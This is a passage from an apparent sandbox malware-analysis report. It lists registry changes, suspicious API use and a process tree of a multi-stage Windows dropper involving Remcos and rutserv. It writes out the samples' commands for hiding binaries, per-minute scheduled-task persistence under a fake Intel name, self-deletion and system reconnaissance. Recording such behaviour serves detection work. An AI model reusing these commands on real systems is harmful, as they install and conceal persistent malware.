| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014365216070" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network" | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\L68Y5XTJ5XBA" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
